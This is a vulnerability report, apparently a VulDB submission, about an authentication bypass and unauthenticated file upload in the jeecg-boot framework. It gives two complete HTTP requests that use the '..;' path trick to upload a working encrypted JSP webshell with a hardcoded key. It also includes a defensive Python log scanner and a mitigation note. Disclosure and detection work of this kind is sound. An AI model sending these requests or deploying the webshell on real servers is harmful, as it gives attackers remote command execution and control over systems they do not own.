| Field | Value |
|---|---|
| Title | Jeecg-Boot Framework Remote Command Execution |

# Description

## Summary
In the jeecg-boot framework (https://github.com/jeecgboot/jeecg-boot), the file-upload API can be reached without authorization by bypassing Shiro's permission check (the `..;` segment in the request path below), which allows a webshell to be uploaded.
Details follow.
## Details
HTTP request used to upload the webshell:
```http
POST /api/..;/cgUploadController.do?ajaxSaveFile&sessionId=7211DABCDAF4D0AAB731C44848F0FB6C%27, HTTP/1.1
Host: ip
Content-Length: 902
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTneEAOeZrAbfrMH4
Accept: */*
Origin: http://ip
Referer: http://ip/api/..;/systemController.do?commonUpload&_=1655456862344
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7211DABCDAF4D0AAB731C44848F0FB6C; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655456211; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655456442
Connection: close
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="name"
skr.jsp
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="documentTitle"
blank
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="file"; filename="skr.jsp"
Content-Type: image/jpeg
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryTneEAOeZrAbfrMH4--
```

Alternatively, an attacker can use this API:
```http
POST /api/..;/commonController.do?parserXml HTTP/1.1
Host: x.x.x.x:8081
Content-Length: 424
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzAtM8p8Ho292J3Vk
Accept: */*
Origin: http://x.x.x.x:8081
Referer: http://x.x.x.x:8081/api/..;/systemController.do?commonUpload&_=1655435878184
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3D38F89CA6887B45CEFB41E4CA65A235; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655433472; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655435715
Connection: close
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="name"
per-index-photo.png
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="documentTitle"
blank
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="file"; filename="per-index-photo.jsp"
Content-Type: image/png
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryzAtM8p8Ho292J3Vk--
```
The ability to upload arbitrary files leads to the final remote command execution.
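As an added illustration of what both requests above rely on (example code, not from the report and not jeecg-boot's own code): a small Python checker that mirrors the mismatch between the raw request path, which Shiro's path-based filter chain matches, and the path the servlet container actually routes after dropping `;` path parameters and resolving `..` segments. It is run over a few constructed access-log lines to flag requests that enter an anonymous prefix on the raw path but are routed to a controller outside it. The `/api/` anonymous prefix, the combined log format and the container normalization rules are assumptions of the example.

```python
import re
from urllib.parse import urlsplit

# Path prefixes the (assumed) Shiro filter chain treats as anonymous, i.e. no login
# required. Constructed for this example; a real deployment's chain may differ.
ANON_PREFIXES = ("/api/",)

# Apache/Nginx combined log format (constructed sample lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)


def strip_path_params(path: str) -> str:
    """Drop ';param' suffixes from every path segment, as the servlet container does
    before mapping the request (so '/api/..;/x' is routed as '/api/../x')."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def normalize(path: str) -> str:
    """Resolve '.' and '..' segments the way the container does when it maps the
    request to a controller. Assumed to approximate Tomcat's behaviour."""
    out = []
    for seg in strip_path_params(path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def shiro_sees_anon(raw_path: str) -> bool:
    """Shiro's path matching is applied to the path as received, so the raw string
    decides which filter chain runs."""
    return raw_path.startswith(ANON_PREFIXES)


def is_filter_bypass(raw_path: str) -> bool:
    """True when the raw path falls in an anonymous chain but the container would
    route it to something outside that prefix: exactly the mismatch to alert on."""
    return shiro_sees_anon(raw_path) and not normalize(raw_path).startswith(ANON_PREFIXES)


def scan_access_log(lines):
    """Return (client_ip, raw_path, routed_path) for every request that looks like a
    path-normalization bypass of the authentication filter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # urlsplit (unlike urlparse) keeps ';' inside the path, which is what we need.
        raw_path = urlsplit(m.group("target")).path
        if is_filter_bypass(raw_path):
            hits.append((m.group("ip"), raw_path, normalize(raw_path)))
    return hits


# Constructed sample log lines: two bypass attempts against the controllers named in
# the report, followed by two ordinary requests that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Aug/2022:08:58:01 +0000] "POST /api/..;/cgUploadController.do?ajaxSaveFile HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Aug/2022:08:58:02 +0000] "POST /api/..;/commonController.do?parserXml HTTP/1.1" 200 310',
    '198.51.100.7 - - [04/Aug/2022:09:00:10 +0000] "GET /api/user/list HTTP/1.1" 200 1024',
    '198.51.100.7 - - [04/Aug/2022:09:00:11 +0000] "GET /loginController.do?login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, raw, routed in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: raw {raw} is routed to {routed} (filter bypass)")
```

The same comparison, applied on the server side before the filter chain runs, is the mitigation: normalize the path once and let both the authorization filter and the dispatcher decide on that single normalized value, rejecting any request whose raw path does not equal its normalized form.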

| Field | Value |
|---|---|
| Source | https://www.cnblogs.com/J0o1ey/p/16550583.html |
| User | J0o1ey (UID 30618) |
| Submitted | 2022-08-04 08:58 (4 years ago) |
| Moderated | 2022-08-04 09:47 (49 minutes later) |
| Status | Accepted |
| VulDB entry | 205594 [jeecg-boot /api/ file privilege escalation] |
| Points | 20 |